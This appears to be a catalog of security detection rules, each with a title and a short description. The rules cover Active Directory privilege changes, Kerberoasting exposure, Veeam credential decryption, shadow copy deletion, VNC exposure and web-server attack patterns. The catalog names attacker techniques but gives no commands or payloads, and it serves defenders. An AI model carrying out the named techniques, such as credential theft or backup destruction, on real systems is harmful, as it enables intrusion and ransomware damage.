EXPLORE DETECTIONS
User account exposed to Kerberoasting
Detects when a user account has the servicePrincipalName attribute modified. Attackers can abuse write privileges over a user to configure Service Principle Names (SPNs) so that they can perform Kerberoasting. Administrators can also configure this for legitimate purposes, exposing the account to Kerberoasting.
User Added to Privileged Group in Active Directory
Identifies a user being added to a privileged group in Active Directory. Privileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems.
User Added to the Admin Group
Identifies users being added to the admin group. This could be an indication of privilege escalation activity.
User Detected with Suspicious Windows Process(es)
A machine learning job combination has identified a user with one or more suspicious Windows processes that exhibit unusually high malicious probability scores. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.
User or Group Creation/Modification
This rule leverages the "auditd_manager" integration to detect user or group creation or modification events on Linux systems. Threat actors may attempt to create or modify users or groups to establish persistence on the system.
Veeam Backup Library Loaded by Unusual Process
Identifies potential credential decrypt operations by PowerShell or unsigned processes using the Veeam.Backup.Common.dll library. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.
Virtual Machine Fingerprinting
An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.
Virtual Machine Fingerprinting via Grep
An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.
Virtual Private Network Connection Attempt
Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN). Adversaries may use VPN connections to laterally move and control remote systems on a network.
VNC (Virtual Network Computing) from the Internet
This rule detects network events that may indicate the use of VNC traffic from the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector.
VNC (Virtual Network Computing) to the Internet
This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector.
Volume Shadow Copy Deleted or Resized via VssAdmin
Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.
Volume Shadow Copy Deletion via PowerShell
Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks.
Volume Shadow Copy Deletion via WMIC
Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.
WDAC Policy File by an Unusual Process
Identifies the creation of a Windows Defender Application Control (WDAC) policy file by an unusual process. Adversaries may use a secially crafted WDAC policy to restrict the execution of security products.
Web Application Suspicious Activity: POST Request Declined
A POST request to a web application returned a 403 response, which indicates the web application declined to process the request because the action requested was not allowed.
Web Application Suspicious Activity: sqlmap User Agent
This is an example of how to detect an unwanted web client user agent. This search matches the user agent for sqlmap 1.3.11, which is a popular FOSS tool for testing web applications for SQL injection vulnerabilities.
Web Application Suspicious Activity: Unauthorized Method
A request to a web application returned a 405 response, which indicates the web application declined to process the request because the HTTP method is not allowed for the resource.
Web Server Discovery or Fuzzing Activity
This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks.
Web Server Exploitation Detected via Defend for Containers
This rule detects the exploitation of a web server through the execution of a suspicious process by common web server user accounts. Attackers may upload a web shell to a web server to maintain access to the system.
Web Server Local File Inclusion Activity
This rule detects potential Local File Inclusion (LFI) activity on web servers by identifying HTTP GET requests that attempt to access sensitive local files through directory traversal techniques or known file paths. Attackers may exploit LFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
Web Server Potential Command Injection Request
This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early.
Web Server Potential Remote File Inclusion Activity
This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
Web Server Potential Spike in Error Response Codes
This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited.